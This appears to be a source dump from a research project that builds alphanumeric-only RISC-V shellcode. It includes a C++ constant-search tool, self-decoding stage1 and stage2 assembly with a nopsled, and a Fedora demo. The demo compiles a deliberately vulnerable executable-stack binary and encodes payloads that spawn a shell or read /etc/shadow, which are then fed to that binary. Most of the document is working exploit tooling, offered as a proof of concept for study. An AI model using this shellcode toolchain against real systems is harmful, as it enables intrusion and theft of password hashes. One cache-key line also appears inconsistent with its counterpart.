 91 |     const __uint128_t target_AB = (((__uint128_t)target_A) << 64) + ((__uint128_t)target_B);
 92 | 
 93 |     char s[40];
 94 |     sprintf(s, CACHE_PATH, target_A, target_B);
 95 |     if(good) {
 96 |         s[34] = 'g';
 97 |     }
 98 | 
 99 |     /* Add to local cache */
100 |     cache_add_local(good, target_AB);
101 | 
102 |     /* Add to global cache */
103 |     int fd = open(s, O_RDWR|O_CREAT, 0777);
104 |     if (fd == -1) {
105 |         printf("OPEN ERROR\n");
106 |         exit(1);
107 |     }
108 |     close(fd);
109 | }
110 | 
111 | static int cached_status(uint64_t target_A, uint64_t target_B)
112 | {
113 |     const __uint128_t target_AB = (((__uint128_t)target_A) << 64) * ((__uint128_t)target_B);
114 | 
115 |     #if 1
116 |     auto search = cache_bad.find(target_AB);
117 |     if (search != cache_bad.end()) {
118 |         return -1;
119 |     }
120 | 
121 |     search = cache_good.find(target_AB);
122 |     if (search != cache_good.end()) {
123 |         return 1;
124 |     }
125 |     #endif
126 | 
127 |     /* Now try global cache */
128 |     char s[40];
129 |     sprintf(s, CACHE_PATH, target_A, target_B);
130 |     if(access(s, F_OK) != -1) {
131 |         //printf("Cached bad\n");
132 |         cache_add_local(false, target_AB);
133 |         return -1;
134 |     }
135 |     s[34] = 'g';
136 |     if(access(s, F_OK) != -1) {
137 |         //printf("Cached good\n");
138 |         cache_add_local(true, target_AB);
139 |         return 1;
140 |     }
141 | 
142 |     return 0;
143 | }
144 | 
145 | #define NO_FORCE false
146 | #define FORCE true
147 | 
148 | #define FOUNDN 48
149 | #define FOUND_MASK ((1UL << FOUNDN) - 1UL)
150 | #define MANT_MASK 0x3FFFFFFFFFFFFUL
151 | 
152 | static bool isaddalnum(uint64_t addu)
153 | {
154 |     addu &= FOUND_MASK;
155 |     static_assert(FOUNDN % 8 == 0);
156 |     int shift = 0;
157 |     while(shift < FOUNDN) {
158 |         if(!isgb((addu >> shift) & 0xFFUL)) {
159 |             return false;
160 |         }
161 |         shift += 8;
162 |     }
163 |     return true;
164 | }
165 | 
166 | typedef struct {
167 |     double fix;
168 | 
169 |     uint64_t target_A;
170 |     uint64_t target_B;
171 |     uint64_t addu_base;
172 | 
173 |     int midx;
174 |     uint64_t mulu;
175 | } t3_t;
176 | 
177 | static bool t3_add(t3_t &t, uint64_t &addu, double &prod, uint64_t target, double mul, bool sub)
178 | {
179 |     prod = mul * t.fix;
180 |     uint64_t produ = d2u(prod);
181 |     uint64_t produ_mant = produ & MANT_MASK;
182 | 
183 |     uint64_t add_mantb;
184 |     if(sub == false) {
185 |         add_mantb = ((target - produ_mant) << 1) & MANT_MASK;
186 |     } else {
187 |         add_mantb = (((produ_mant << 1) - target) << 0) & MANT_MASK;
188 |     }
189 | 
190 |     addu = t.addu_base | add_mantb;
191 | 
192 | #if 1
193 |     double d = prod + u2d(addu);
194 |     if(sub) {
195 |         d = prod - u2d(addu);
196 |     }
197 |     uint64_t u = d2u(d);
198 |     if((u&FOUND_MASK) != target) {
199 |         //printf("H: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", d2u(mul), mul, addu, u2d(addu), u, d, FOUNDN/4, t.target_A, t.found_n);
200 |         printf("G[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", sub?'s':' ', produ, prod, addu, u2d(addu), u, d, FOUNDN/4, t.target_A);
201 |         printf("error target: have:0x%lx tgt:0x%lx [mul:%f]\n", u, target, mul);
202 |         exit(1);
203 |     }
204 | 
205 | #endif
206 | 
207 |     return isaddalnum(addu);
208 | }
209 | 
210 | static bool t3_third(t3_t &t, uint64_t &addu, double &prod, bool &n, uint64_t target, double mul)
211 | { //Note: fmadd and fnmsub lead to the same result (mantisse wise)
212 |     bool ret = false;
213 |     ret = t3_add(t, addu, prod, target, mul, 0);
214 |     if(ret) {
215 |         n = false;
216 |         return ret;
217 |     }
218 |     ret = t3_add(t, addu, prod, target, mul, 1);
219 |     if(ret) {
220 |         n = true;
221 |         return ret;
222 |     }
223 |     return ret;
224 | }
225 | 
226 | static bool t3_second(t3_t &t, long int retries)
227 | {
228 |     double mul = u2d(t.mulu);
229 | 
230 |     uint64_t addu; double prod; bool n;
231 |     bool ret = t3_third(t, addu, prod, n, t.target_A, mul);
232 |     if(!ret) {
233 |         return false;
234 |     }
235 |     double add = u2d(addu);
236 |     double d = prod + add; /* f(n)madd(mul, t.fix, add); */
237 |     uint64_t u = d2u(d);
238 | 
239 |     uint64_t B_addu; double B_prod; bool B_n;
240 |     ret = t3_third(t, B_addu, B_prod, B_n, t.target_B, mul);
241 |     if(!ret) {
242 |         return false;
243 |     }
244 |     double B_add = u2d(B_addu);
245 |     double B_d = B_prod + B_add; //fmadd(mul, t.fix, add);
246 |     if(B_n) {
247 |         B_d = B_prod - B_add;
248 |     }
249 |     uint64_t B_u = d2u(B_d);
250 | 
251 |     //printf("FIX: [0x%lx %.16e]\n", d2u(t.fix), t.fix);
252 |     printf("Y[%c]: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", n?'s':' ', t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target_A, retries);
253 |     //printf("y[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", n?'s':' ', d2u(prod), prod, addu, add, u, d, FOUNDN/4, t.target_A, retries);
254 |     printf("Z[%c]: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", B_n?'s':' ', t.mulu, mul, B_addu, B_add, B_u, B_d, FOUNDN/4, t.target_B, retries);
255 |     //printf("z[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", B_n?'s':' ', d2u(B_prod), B_prod, B_addu, B_add, B_u, B_d, FOUNDN/4, t.target_B, retries);
256 | 
257 |     //printf("X: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
258 | 
259 |     return true;
260 | }
261 | 
262 | static bool t3_mul(t3_t &t, int idx)
263 | {
264 |     long int max_tries = 2*1000*1000;
265 |     long int retries = 0;
266 |     srand(0U);
267 | 
268 |     while(retries < max_tries) {
269 |         for(int i=0; i<=idx; i++) {
270 |             t.mulu &= ~(0xFFUL << (8*i));
271 |             t.mulu |= ((uint64_t)GB[rand()%GBN]) << (8*i);
272 |         }
273 | 
274 |         if(t3_second(t, retries)) {
275 |             return true;
276 |         }
277 |         retries++;
278 |     }
279 |     return false;
280 | }
281 | 
282 | bool test3(uint64_t target_A, uint64_t target_B, bool force, int filei)
283 | {
284 |     if((target_A & FOUND_MASK) != target_A) {
285 |         printf("Bad target A.\n");
286 |         exit(1);
287 |     }
288 |     if((target_B & FOUND_MASK) != target_B) {
289 |         printf("Bad target B.\n");
290 |         exit(1);
291 |     }
292 | 
293 |     int status = cached_status(target_A, target_B);
294 |     if(status == -1) {
295 |         //printf("Cached bad\n");
296 |         return false;
297 |     } else if((status == 1) && (!force)) {
298 |         //printf("Cached good\n");
299 |         return true;
300 |     }
301 | 
302 |     printf("XX[%d]: %012lx-%012lx not found!!\n", filei, target_A, target_B);
303 | 
304 |     t3_t t = {};
305 |     t.fix = u2d(0x4131555555555555UL);
306 |     t.mulu = 0x4131555555555555UL;
307 |     t.addu_base = 0x4260000000000000UL;
308 | 
309 |     t.midx = 5;
310 | 
311 |     t.target_A = target_A;
312 |     t.target_B = target_B;
313 | 
314 |     bool ret = t3_mul(t, t.midx);
315 | 
316 |     if(!((status == 1) && force)) {
317 |         cache_add(ret, target_A, target_B);
318 |     }
319 | 
320 |     return ret;
321 | }
322 | 
323 | static uint64_t getT(const uint16_t *buf, size_t idx)
324 | {
325 |     idx = 3*idx;
326 |     uint64_t r = buf[idx];
327 |     r += ((uint64_t) buf[++idx]) << 16;
328 |     r += ((uint64_t) buf[++idx]) << 32;
329 |     return r;
330 | }
331 | 
332 | static bool try_config(uint16_t *buf, bool force, int filei)
333 | {
334 |     bool b;
335 | 
336 |     uint64_t target_A = getT(buf, 0);
337 |     uint64_t target_B = getT(buf, 1);
338 |     b = test3(target_A, target_B, force, filei);
339 |     if(!b) {
340 |         return 0;
341 |     }
342 | 
343 |     uint64_t target_C = getT(buf, 2);
344 |     uint64_t target_D = getT(buf, 3);
345 |     b = test3(target_C, target_D, force, filei);
346 |     if(!b) {
347 |         return 0;
348 |     }
349 | 
350 |     uint64_t target_E = getT(buf, 4);
351 |     uint64_t target_F = getT(buf, 5);
352 |     target_F &= 0xFFFFFFFFUL;
353 |     target_F |= target_E & 0xFFFF00000000UL;
354 |     b = test3(target_E, target_F, force, filei);
355 |     if(!b) {
356 |         return 0;
357 |     }
358 | 
359 |     return 1;
360 | }
361 | 
362 | #define BCOUNT 20
363 | 
364 | static bool try_file(const uint16_t *orig_buf, bool force, int filei)
365 | {
366 |     uint16_t buf[BCOUNT];
367 |     memcpy(buf, orig_buf, sizeof(buf));
368 | 
369 |     for(int a=0; a<6; a++) {
370 |         switch(a) {
371 |             case 0:
372 |                 break;
373 |             case 1:
374 |                 buf[4] = orig_buf[4];
375 |                 buf[5] = orig_buf[5];
376 |                 buf[6] = orig_buf[7];
377 |                 buf[7] = orig_buf[6];
378 |                 break;
379 |             case 2:
380 |                 buf[4] = orig_buf[6];
381 |                 buf[5] = orig_buf[4];
382 |                 buf[6] = orig_buf[5];
383 |                 buf[7] = orig_buf[7];
384 |                 break;
385 |             case 3:
386 |                 buf[4] = orig_buf[6];
387 |                 buf[5] = orig_buf[7];
388 |                 buf[6] = orig_buf[4];
389 |                 buf[7] = orig_buf[5];
390 |                 break;
391 |             case 4:
392 |                 buf[4] = orig_buf[7];
393 |                 buf[5] = orig_buf[4];
394 |                 buf[6] = orig_buf[5];
395 |                 buf[7] = orig_buf[6];
396 |                 break;
397 |             case 5:
398 |                 buf[4] = orig_buf[7];
399 |                 buf[5] = orig_buf[6];
400 |                 buf[6] = orig_buf[4];
401 |                 buf[7] = orig_buf[5];
402 |                 break;
403 | 
404 |         }
405 | 
406 |         for(int b=0; b<7; b++) {
407 |             for(int i=0; i<7; i++) {
408 |                 if(i < b) {
409 |                     buf[8+i] = orig_buf[9+i];
410 |                 } else if(b == i) {
411 |                     buf[8+i] = orig_buf[8];
412 |                 } else { /* i > b */
413 |                     buf[8+i] = orig_buf[9+i-1];
414 |                 }
415 |             }
416 |             bool ret = try_config(buf, NO_FORCE, filei);
417 |             if(ret) {
418 |                 if(force) {
419 |                     printf("CONFIG [%d]:", b);
420 |                     uint8_t *bbuf = (uint8_t *) buf;
421 |                     for(size_t i=0; i<BCOUNT*2; i++) {
422 |                         if(i%6 == 0) {
423 |                             if(i%12 == 0) {
424 |                                 printf(" ");
425 |                             } else {
426 |                                 printf("-");
427 |                             }
428 |                         }
429 |                         printf("%02x", bbuf[i]);
430 |                     } printf("\n");
431 |                     try_config(buf, force, filei);
432 |                 }
433 |                 return true;
434 |             }
435 |         }
436 |     }
437 |     return 0;
438 | }
439 | 
440 | int main(int argc, char *argv[])
441 | {
442 |     std::fesetround(FE_UPWARD);
443 | 
444 |     if(argc != 3) {
445 |         fprintf(stderr, "Usage: %s <start> <end>\n", argv[0]);
446 |         fprintf(stderr, "\tWill run %s on [start;end[ range\n", argv[0]);
447 |         exit(1);
448 |     }
449 | 
450 |     int start = atoi(argv[1]);
451 |     int end = atoi(argv[2]);
452 |     printf("Try: %d->%d\n", start, end-1);
453 | 
454 |     char infile[] = "build/xxxxxxxxxxxxxxx";
455 |     for(int i=start; i<end; i++) {
456 |         uint16_t orig_buf[BCOUNT];
457 |         sprintf(infile+6, "%d.x", i);
458 |         FILE *fp = fopen(infile, "r");
459 |         if(fp == NULL) {
460 |             printf("fopen failed.\n");
461 |             exit(1);
462 |         }
463 |         size_t fret = fread(orig_buf, sizeof(orig_buf), 1, fp);
464 |         if(fret != 1) {
465 |             printf("fread failed.\n");
466 |             exit(1);
467 |         }
468 |         fclose(fp);
469 | 
470 |         bool ret = try_file(orig_buf, NO_FORCE, i);
471 |         if(ret) {
472 |             printf("Found [%d]!\n", i);
473 |             try_file(orig_buf, FORCE, i);
474 |             exit(42);
475 |         }
476 |     }
477 | }


--------------------------------------------------------------------------------
/baremetal/tick/stage1.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | include(`../scripts/common.m4')#'
  7 | 
  8 | #define XP sp
  9 | #define CONSTR ft4
 10 | .macro dangerous_nop2
 11 |     li     t1,-2
 12 | .endm
 13 | 
 14 | #ifndef COMPUTE_XP_FIXUP
 15 | /*# Defines 'xp_fixup' and 'end_nopsled' */
 16 | #include "xp_fixup.S"
 17 | #endif
 18 | 
 19 | .global _start
 20 | _start:
 21 |     # NON-ALNUM gadget: Enable FP extensions
 22 |     li     t2, 0x2000
 23 |     csrw mstatus, t2
 24 | 
 25 | step0:
 26 |     .word 0x2730276F /*# This is the minimal 'jal reg, step1'. reg is 'a4' */
 27 | 
 28 | /*# Note: stage2 pool is currently built by hand. This could be improved. */
 29 | stage2_pool:
 30 | #define NULLDW 0x4242424242424242
 31 |     .8byte NULLDW
 32 |     .8byte NULLDW
 33 |     .8byte NULLDW
 34 |     .8byte NULLDW
 35 |     .8byte NULLDW
 36 |     .8byte NULLDW
 37 |     .8byte 0x4261447a6f314233 #  48 # ADD_3A
 38 |     .8byte 0x42627073717a5a42 #  56 # ADD_1B
 39 |     .8byte NULLDW
 40 |     .8byte NULLDW
 41 |     .8byte 0x4261706e69633436 #  80 # ADD_2A
 42 |     .8byte NULLDW
 43 |     .8byte NULLDW
 44 |     .8byte 0x4261447a31356775 # 104 # ADD_3B
 45 |     .8byte 0x413166346e514956 # 112 # MUL_2
 46 |     .8byte 0x426132356a4b6e31 # 120 # ADD_2B
 47 |     .8byte NULLDW
 48 |     .8byte NULLDW
 49 |     .8byte NULLDW
 50 |     .8byte NULLDW
 51 |     .8byte 0x4131706f64596870 # 160 # MUL_4
 52 |     .8byte 0x4261336f596c5239 # 168 # ADD_4A
 53 |     .8byte 0x4131352778497450 # 176 # MUL_3
 54 |     .8byte 0x4131567a47714b4d # 184 # MUL_1
 55 |     .8byte NULLDW
 56 |     .8byte NULLDW
 57 |     .8byte NULLDW
 58 |     .8byte NULLDW
 59 |     .8byte NULLDW
 60 |     .8byte NULLDW
 61 |     .8byte 0x4131555555555555 # 240  # FIX
 62 |     .8byte 0x426358466535524c # 248  # ADD_1A
 63 | 
 64 | payload_pool:
 65 |     repeat(5303, {.half 0x4242})
 66 | 
 67 | step1: /*# Move 'link' register to XP */
 68 |     sra      s4, zero, s3 /*# s4 := 0 */
 69 |     sra      XP, a4, s4   /*# XP := a4 */
 70 | 
 71 | step2:
 72 |                      #Role   [Can]
 73 |     fld fa0,  48(XP) #ADD_3A [AM]
 74 |     fld fa2,  56(XP) #ADD_1B [AM]
 75 |     fld fa4,  80(XP) #ADD_2A [AM]
 76 |     fld fa6, 112(XP) #MUL_2  [ M]
 77 |     fld fs0, 120(XP) #ADD_2B [AM]
 78 |     fld fs2, 176(XP) #MUL_3  [ M]
 79 |     fld ft2, 184(XP) #MUL_1  [ M]
 80 |     fld ft4, 240(XP) #FIX    [ M]
 81 |     fld ft6, 248(XP) #ADD_1A [AM]
 82 |    #fld ft0, 296(XP) #       [ M]
 83 | 
 84 | step3: /*# Fixup XP (Need to have 'XP == step6') */
 85 |     #ifndef COMPUTE_XP_FIXUP
 86 |     xp_fixup
 87 |     #endif
 88 | 
 89 | step4: /*# Write stage2 */
 90 | .macro next_block
 91 |     /*# 'addi XP,XP,16', but gas chooses another non-alnum encoding */
 92 |     .short 0x6141
 93 | .endm
 94 | .macro fblock op, dstr, mulr, addr, store_offset, round=rup
 95 |     fm\op\().d \dstr, \mulr, CONSTR, \addr, \round
 96 |     fsd     \dstr, \store_offset(XP)
 97 | .endm
 98 |     fblock  add, ft6, ft2, ft6, 1952
 99 |     fblock  add, ft6, ft2, fa2, 1958
100 | 
101 |     fblock  sub, ft6, fa6, fa4, 1964
102 |     fblock  sub, ft6, fa6, fs0, 1970
103 | 
104 |     next_block
105 | 
106 |     fld fa2, 104(a4) #ADD_3B [AM]
107 |     fld fa4, 160(a4) #MUL_4  [AM]
108 |     fld fa1, 168(a4) #ADD_4A [A ]
109 |    #fld fa3, 224(a4) #       [A ]
110 |    #fld fs1, 232(a4) #       [A ]
111 | 
112 |     fblock  sub, ft6, fs2, fa0, 1960
113 |     fblock  sub, ft6, fs2, fa2, 1966
114 | 
115 |     fblock  sub, ft6, fa4, fa1, 1970
116 |     #fblock  add, ft6, fa4, fa3, 19xx
117 | 
118 | step5: /*# Nopsled to make up for loose ends. */
119 |     #ifndef COMPUTE_XP_FIXUP
120 |     end_nopsled
121 |     #endif
122 | 
123 | step6: /*# Stage 2 will be decoded here */
124 |     csrc  mip,sp
125 | .global end
126 | end:
127 | 


--------------------------------------------------------------------------------
/baremetal/tick/stage1.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0x80000000;
11 |     .text . : SUBALIGN(4096) { *(.text) }
12 |     .data : { *(.data) }
13 | }
14 | 


--------------------------------------------------------------------------------
/baremetal/tick/stage2.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | /*# Allowed registers: s0;a0-a5 (also s1 in specific cases)
 7 |  *# (exception: XS can take any value)
 8 |  */
 9 | #define XA s0
10 | #define XB a5
11 | #define XP a1
12 | #define XQ a2
13 | #define XS t5
14 | #define XJ a3
15 | 
16 |     fence.i
17 |     lui  XQ, 0xfffff    /*# Negative offset to get back somewhere in pool */
18 |                         /*#  'insert' needs to sync with this */
19 |     add  XQ, XQ, sp     /*# Start addr to store to */
20 |     addi XS, XQ, 0x400  /*# Upper store limit */
21 |     mv   XP, XQ         /*# Start addr to load from */
22 |     mv   XJ, XQ         /*# Where to jump */
23 | /*# Decoding loop. See paper for explanation */
24 | next:
25 |     lw   XA, 4(XP)
26 |     mv   XB, XA
27 |     srli XB, XB, 4
28 |     addi XP, XP, 2
29 |     xor  XA, XA, XB
30 |     sw   XA, 0(XQ)
31 |     addi XQ, XQ, 1
32 |     bltu  XQ, XS, next
33 | done:
34 |     fence.i
35 |     jalr XJ
36 | 


--------------------------------------------------------------------------------
/fedora/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | out
3 | 


--------------------------------------------------------------------------------
/fedora/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | RV_ABI    := rv64gc
 7 | include ../scripts/common.mk
 8 | OUT := out
 9 | 
10 | all: $(BUILD)/vuln.bin \
11 |      $(OUT)/hello_hash.txt  $(OUT)/hello_slash.txt  $(OUT)/hello_tick.txt \
12 |      $(OUT)/shell_hash.txt  $(OUT)/shell_slash.txt  $(OUT)/shell_tick.txt \
13 |      $(OUT)/shadow_hash.txt $(OUT)/shadow_slash.txt $(OUT)/shadow_tick.txt
14 | 
15 | $(BUILD):
16 | 	$(Q)mkdir -p $@
17 | 
18 | $(OUT):
19 | 	$(Q)mkdir -p $@
20 | 
21 | $(BUILD)/vuln.bin: $(BUILD)/main.o
22 | 	$(Q)$(GCC) -Wl,-N -z execstack -o $@.nostrip $^
23 | 	@#riscv64-unknown-elf-objcopy --set-section-flags .text=contents,alloc,load,code $< $@
24 | 	@#riscv64-unknown-elf-strip $@.nostrip -o $@
25 | 	@cp $@.nostrip $@
26 | 
27 | $(BUILD)/main.o: main.c | $(BUILD)
28 | 	$(Q)$(GCC) -o $@ -c $< -Wall -Wextra -O2
29 | 
30 | include ../payload/payload.mk
31 | 
32 | # $1: user-friendly name
33 | # $2: check regex
34 | # $3: encode p arg
35 | # $4: encode v arg
36 | # $5: payload
37 | # $6: shellcode-flavour
38 | define build_shellcode =
39 | $(BUILD)/shellcode_$1.o: $6.S $(BUILD)/$1.encoded
40 | 	$(Q)$(GCC) $(ASFLAGS) -o $$@ -c $$< -DPAYLOAD_FILE="\"$$(word 2,$$^)\""
41 | 
42 | $(BUILD)/$1.encoded: $(BUILD)/$5.bin encode.php
43 | 	$(Q)php $$(word 2,$$^) -i $$< -o $$@ -p $3 -v $4
44 | 
45 | $(BUILD)/shellcode_$1.txt: $(BUILD)/shellcode_$1.o
46 | 	$(Q)$(OBJCOPY) -O binary $$< $$@
47 | 
48 | $(OUT)/$1.txt: $(BUILD)/shellcode_$1.txt check.php | $(OUT)
49 | 	$(Q)php $$(word 2,$$^) -i $$< -c $2
50 | 	$(Q)cp $$< $$@
51 | endef
52 | 
53 | # $1: payload
54 | # $2: user-friendly name
55 | define build_shellcode_family =
56 | $(eval $(call build_payload,$1,0x40000,$(BUILD)/$1.bin))
57 | 
58 | $(eval $(call build_shellcode,$2_hash, "A-Za-z0-9#", 10798,0x1414,$1,hash))
59 | $(eval $(call build_shellcode,$2_slash,"A-Za-z0-9\/",10966,0x1E8C,$1,slash))
60 | $(eval $(call build_shellcode,$2_tick, "A-Za-z0-9\'",10606,0x1264,$1,tick))
61 | endef
62 | 
63 | $(eval $(call build_shellcode_family,payload_linux_hello,hello))
64 | $(eval $(call build_shellcode_family,payload_linux_shell,shell))
65 | $(eval $(call build_shellcode_family,payload_linux_etc_shadow,shadow))
66 | 
67 | .PHONY: clean
68 | clean:
69 | 	rm -rf $(BUILD) $(OUT)
70 | 


--------------------------------------------------------------------------------
/fedora/README.txt:
--------------------------------------------------------------------------------
 1 | This folder contains the demos running on Fedora on the QEMU.
 2 | 
 3 | How to use:
 4 | 1- Build the project: `make`
 5 | 2- Copy the following files on the Fedora guest:
 6 |    - `build/vuln.bin`
 7 |    - `out/hash.txt`
 8 |    - `out/slash.txt`
 9 |    - `out/tick.txt`
10 | 3- Run the demos:
11 |    `./vuln.bin < hash.txt`
12 |    `./vuln.bin < slash.txt`
13 |    `./vuln.bin < tick.txt`
14 | 


--------------------------------------------------------------------------------
/fedora/check.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	$args = getopt('i:c:');
 9 | 
10 | 	$f = file_get_contents($args['i']);
11 | 
12 | 	$regex = "/[".$args['c']."]/";
13 | 
14 | 	/* For debug */
15 | 	function not_alnum_verbose(&$f, $regex) {
16 | 		$len = strlen($f);
17 | 		for ($i=0; $i<$len; $i++) {
18 | 			$c = $f[$i];
19 | 			if (preg_replace($regex, '', $c) !== '') {
20 | 				printf("Not alnum (0x%x)!\n", $i);
21 | 				return;
22 | 			}
23 | 		}
24 | 	}
25 | 
26 | 	if (preg_replace($regex, '', $f) !== '') {
27 | 		not_alnum_verbose($f, $regex);
28 | 		//exit(0); /* For dev */
29 | 		exit(1);
30 | 	}
31 | ?>


--------------------------------------------------------------------------------
/fedora/encode.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	function error($errno, $errstr, $errfile, $errline) {
 9 | 		throw new ErrorException($errstr, $errno, 0, $errfile, $errline);
10 | 	}
11 | 	set_error_handler('error');
12 | 
13 | 	$args = getopt('i:o:p:v:');
14 | 
15 | 	$p = file_get_contents($args['i']); /* Input file */
16 | 	$pool_size = intval($args['p']); /* Pool size (in bytes) */
17 | 	$payload_offset = intval($args['v'], 0); /* Payload offset (in bytes) */
18 | 	$maxpayload = 0x400; /* It is possible to increase it with minor work */
19 | 
20 | 	$payload_size = strlen($p);
21 | 	if($payload_size > $maxpayload) {
22 | 		printf("Payload too large: %d/%d\n", strlen($p), $maxpayload);
23 | 		exit(-1);
24 | 	}
25 | 
26 | 	$s = ".fill ". $payload_offset .", 1, 0x42\n";
27 | 	printf("insert: %d bytes from offset:0x%x\n", 2*$payload_size, $payload_offset);
28 | 	for($i = 0 ; $i<min($maxpayload, $payload_size); $i++)
29 | 	{
30 | 		/* [Notation: capital letters are hex digits]
31 | 		 * We want to encode byte 'XY' in alnum bytes 'KA' 'LB'.
32 | 		 * The equation to solve (see stage2.S) is:
33 | 		 * XY == KA ^ BK, ('XY'€[0;255], 'KA' and 'LB' alnum]
34 | 		 */
35 | 		$q = ord($p[$i]);
36 | 		$wanted_bottom  = $q & 0xF;
37 | 		$wanted_top = ($q >> 4) & 0xF;
38 | 
39 | 		$low_top = 0x4;
40 | 		if($wanted_bottom == 0x4) {
41 | 			$low_top = 0x6;
42 | 		}
43 | 		$low_bottom = $wanted_bottom ^ $low_top;
44 | 
45 | 		$high_bottom = $wanted_top ^ $low_top;
46 | 		$high_top = ($high_bottom == 0) ? 0x5 : 0x4;
47 | 
48 | 		$low  = ($low_top << 4) + $low_bottom;
49 | 		$high = ($high_top << 4) + $high_bottom;
50 | 
51 | 		$s .= sprintf(".short 0x%02x%02x\n", $high, $low);
52 | 	}
53 | 
54 | 	$pool_size -= $payload_offset + 2*$payload_size;
55 | 	if($pool_size > 0) {
56 | 		$s .= ".fill ". $pool_size .", 1, 0x42\n";
57 | 	}
58 | 	file_put_contents($args['o'], $s);
59 | ?>
60 | 


--------------------------------------------------------------------------------
/fedora/hash.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .global shellcode
  7 | shellcode:
  8 | 
  9 | .macro dangerous_nop2
 10 |  li t1,-2
 11 | .endm
 12 | .macro xp_fixup
 13 |     # n464:15 n448:5
 14 |     addi sp, sp, 464
 15 |     addi sp, sp, 464
 16 |     addi sp, sp, 464
 17 |     addi sp, sp, 464
 18 |     addi sp, sp, 464
 19 |     addi sp, sp, 464
 20 |     addi sp, sp, 464
 21 |     addi sp, sp, 464
 22 |     addi sp, sp, 464
 23 |     addi sp, sp, 464
 24 |     addi sp, sp, 464
 25 |     addi sp, sp, 464
 26 |     addi sp, sp, 464
 27 |     addi sp, sp, 464
 28 |     addi sp, sp, 464
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 | .endm
 35 | .macro end_nopsled
 36 |     # len:0
 37 | .endm
 38 | step0:
 39 |     .rept 88
 40 |         dangerous_nop2
 41 |     .endr
 42 |      .word 0x2330236F
 43 | payload_pool:
 44 |     .include PAYLOAD_FILE
 45 | step1:
 46 |     sra s4, zero, s3
 47 |     sra sp, t1, s4
 48 | step3:
 49 |     xp_fixup
 50 | step4:
 51 | .macro next_block
 52 |     .short 0x6141
 53 | .endm
 54 |     # Loading 0x100f in x6
 55 |     lui t1,0x11
 56 |     addiw t1,t1,-10
 57 |     addiw t1,t1,25
 58 |     sd t1, 1920(sp)
 59 |     # Loading 0x0 in x20
 60 |     lui s4,0x10
 61 |     sd s4, 1922(sp)
 62 |     # Loading 0x777d in x6
 63 |     lui a0,0x37763
 64 |     li s4,12
 65 |     sra t1,a0,s4
 66 |     addiw t1,t1,26
 67 |     sd t1, 1924(sp)
 68 |     # Loading 0x970a in x6
 69 |     lui a0,0x396f4
 70 |     li s4,12
 71 |     sra t1,a0,s4
 72 |     addiw t1,t1,22
 73 |     sd t1, 1926(sp)
 74 |     # Loading 0xf93 in x6
 75 |     lui a0,0x7a233
 76 |     li s4,19
 77 |     sra t1,a0,s4
 78 |     addiw t1,t1,19
 79 |     addiw t1,t1,30
 80 |     addiw t1,t1,30
 81 |     sd t1, 1928(sp)
 82 |     # Loading 0x4007 in x6
 83 |     lui t1,0x14
 84 |     addiw t1,t1,-10
 85 |     addiw t1,t1,17
 86 |     sd t1, 1930(sp)
 87 |     # Loading 0x853a in x6
 88 |     lui a0,0x38524
 89 |     li s4,12
 90 |     sra t1,a0,s4
 91 |     addiw t1,t1,22
 92 |     sd t1, 1932(sp)
 93 |     # Loading 0x86ba in x6
 94 |     lui a0,0x386a4
 95 |     li s4,12
 96 |     sra t1,a0,s4
 97 |     addiw t1,t1,22
 98 |     sd t1, 1934(sp)
 99 |     # Loading 0x4140 in x20
100 |     lui a0,0x50503
101 |     li s4,14
102 |     sra s4,a0,s4
103 |     sd s4, 1936(sp)
104 |     # Loading 0x87a2 in x20
105 |     lui t1,0x387a2
106 |     li s2,12
107 |     sra s4,t1,s2
108 |     sd s4, 1938(sp)
109 |     next_block
110 |     # Loading 0x8391 in x20
111 |     lui a0,0x30723
112 |     li s4,13
113 |     sra s4,a0,s4
114 |     sd s4, 1924(sp)
115 |     # Loading 0x509 in x20
116 |     lui a0,0x41424
117 |     li s4,14
118 |     sra s4,a0,s4
119 |     sd s4, 1926(sp)
120 |     # Loading 0x8c3d in x6
121 |     lui t1,0x23462
122 |     li s2,12
123 |     addiw s2,s2,-5
124 |     sra t1,t1,s2
125 |     addiw t1,t1,-3
126 |     sd t1, 1928(sp)
127 |     # Loading 0xc300 in x6
